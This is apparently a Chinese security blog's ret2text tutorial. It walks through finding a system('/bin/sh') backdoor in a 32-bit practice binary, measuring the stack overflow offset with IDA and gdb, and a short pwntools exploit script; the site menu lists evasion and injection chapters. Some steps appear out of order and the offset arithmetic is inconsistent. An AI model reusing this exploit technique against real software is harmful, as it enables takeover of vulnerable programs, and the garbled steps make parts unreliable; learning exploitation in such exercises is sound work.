onedaybook
  • 关于这个博客
  • C2工具原理分析
    • C2工具原理分析:从生成shellcode到上线CS服务器全过程
  • DevilC2工具开发
    • 关于这个项目
  • Rootkit工具开发
  • EvilLoader工具开发
  • 免杀
    • 问鼎免杀之路
      • 序言
      • 第一章-基础
        • 0-基础
        • 1-PE的相关数据结构
        • 2-WindowsAPI
        • 3-混淆加密
        • 4-特征修改
        • 5-分离
        • 6-转换
        • 7-保护
      • 第二章-执行与注入技术
        • 0-创建线程注入(CreateThread Injection)
        • 1-创建纤程注入(CreateFiber Injection)
        • 2-创建远程线程注入(CreateRemoteThread Injection)
        • 3-创建堆注入(HeapCreate Injection)
        • 4-创建线程池注入(CreateThreadpoolWait Injection)
        • 5-进程镂空注入(Process Hollowing Injection)
        • 6-DLL镂空注入(DLL Hollowing Injection)
        • 7-DLL劫持注入(涉及白加黑)
        • 8-映射注入(Mapping Injection)
        • 9-MapViewOfFile+NtMapViewOfSection
        • 10-挂钩注入(SetWindowsHookEx Injection)
        • 11-注册表注入
        • 12-设置上下文劫持注入(SetContext Hijack Injection)
        • 13-剪贴板注入(Clipboard Injection)
        • 14-突破session 0远程线程注入
        • 15-枚举RWX区域注入
        • 16-APC注入(APC Injection)
        • 17-APC & NtTestAlert Injection
        • 18-APC劫持
        • 19-Early Bird
        • 20-基于资源节加载shellcode
        • 21-内核回调表注入(KernelCallbackTable Injection)
        • 22-自举的代码幽灵——反射DLL注入(Reflective DLL Injection)
        • 23-内存申请总结
        • 24-移动或复制shellcode总结
        • 25-shellcode执行总结
      • 第三章-防御规避
        • 0-动态获取API函数(又称隐藏IAT)
        • 1-重写ring3 API函数
        • 2-自定义 String 哈希算法
      • 第四章-武器化
        • 0-Windows Shellcode开发
        • 1-Windows Shellcode开发(x86 stager)
        • 2-Windows Shellcode开发(x64 stager)
        • 3-Linux Shellcode开发(Stager & Reverse Shell)
        • 4-非PEB获取ntdll和kernel32模块基址的精妙之道
        • 5-从SRDI原理剖析再到PE2Shellcode的实现
      • 第五章-主动进攻
      • 第六章-社工钓鱼
    • 随笔
      • 0-用哥斯拉插件零基础免杀上线msf和cs
      • 1-新版RDI
      • 2-新新版RDI
  • 权限提升
  • 数字取证/应急响应
  • 工具二开
    • 哥斯拉二开
      • 环境准备
  • 代码审计
  • PWN
    • ret2text
    • ret2shellcode
    • ret2syscall
    • ret2libc1
    • ret2libc2
    • ret2libc3
Powered by GitBook
On this page
  1. PWN

ret2text

PreviousPWNNextret2shellcode

1、查看架构和保护措施

使用checksec <文件>查看架构

几个方向:

①没有PIE,ret2libc

②没有NX保护,ret2shellcode

③其他:ret2csu,ret2syscall,ret2text

2、寻找后门函数

  • 根据checksec,我们已经知道文件是32位,用32位的IDA静态分析

  • 在函数窗口(Functions Windows)中按”Crtl+F“搜索”system“,看是否存在system函数

发现了system函数,且该函数存在于plt段,且拥有参数”/bin/sh“,system函数相当于shellcode

  • 按”Ctrl+A“全选,然后鼠标右键点击”Copy to Assmenbly“来到汇编窗口,接着按空格进入到内存的所有汇编代码视图窗口

  • 记下system后门函数的地址(因为没有开PIE保护,我们能直接利用返回地址返回到system),一般而言调用函数的第一句汇编语言是”pop ebx“,所以system函数的地址为:0x08048522

3、寻找危险函数

  • 来到main函数的汇编窗口,按”F5“,进行反汇编成C语言代码,分析main的主逻辑

  • 主逻辑分析:

    • setbuf函数用于关闭缓冲区,使得内存的内容直接输入或输出到I/O设备,不存在漏洞

    • vulnerable自己编写的函数,看着很可疑

4、计算偏移量

  • 计算偏移量有两种方式

    • 第一种是利用IDA静态分析得出的”ebp-10h“,可以知道buffer距离ebp的偏移量为10h,我们需要覆盖到返回地址(返回地址在ebp的下一个连续的存储单元,即紧邻ebp的下一位)为:0x10h+0x4

    • 第二种是利用gdb动态调试

  • gdb动态调试求偏移量

①gdb <文件>

②b mian 或者start进入到程序的入口(当面对较复杂时,在我们想要的位置上打断点,具体会在ret2libc3介绍)

③使用r命令,如果有断点,停在断点处;

⑤一直步过到“call vulnerable”,输入si指令,进入到函数内部(通过IDA的静态分析,我们已经知道缓冲区溢出是vulnerable函数里的buffr局部变量)

观察“BACKTRACE”函数调用栈的先后顺序窗口可知,我们已经进入到vulnerable函数内部

⑥继续按ni单步执行到gets函数,此时终端处于等待用户输入的状态

我们输入’aaaa‘刚好32位的数据,然后执行stack <数字>查看任意多行的栈空间的情况

观察’aaaa‘数据最后是存放在哪里,我们发现’aaaa‘数据最后存放在0xffffd188的位置上

⑦计算buff2到ret_addr的偏移量

buff2的地址为:0xffffd188

ret_addr的地址为:0xffffd19c(其实gdb已经告诉我们这个地址里的内容就是main函数的下一条指令:sub esp,0xc 的地址)

使用gdb自带的计算距离的指令:distance <地址1> <地址2>

distance 0xffffd188 0xffffd193

计算得出偏移量为:0x14 bytes

5、编写exp

from pwn import * #引入pwntools模块

io = process('./ret2text')#建立io

#io = remote('网址或IP地址',端口)

io.recv()#接受服务端的数据

system_addr = 0x08048522#system的地址

payload = flat([b'A'*0x14,system_addr])#推荐使用

#构造payload,其中flat是将列表封装起来,变成bit流数据。

#填充b'A'*0x14个垃圾数据,ret_addr的位置填入system_addr到达劫持程序的执行流的目的

#payload = b'A'*0x14+p32(system_add)

io.sendline(payload)#各户端发送数据

io.interactive()#进行交互模式

点入vulnerable函数,发现该函数的功能为调用get函数往缓冲区buffer(即vulnerable函数栈桢的local var)写数据。由于字符数组buffer的长度为8字节,但是gets函数可以输入无限字节的字符串,这就会造成溢出!所以在vulnerable函数栈帧内发生溢出,准备计算偏移量

④在“DISASM”反汇编窗口观察程序执行逻辑,输入ni,进行单步过操作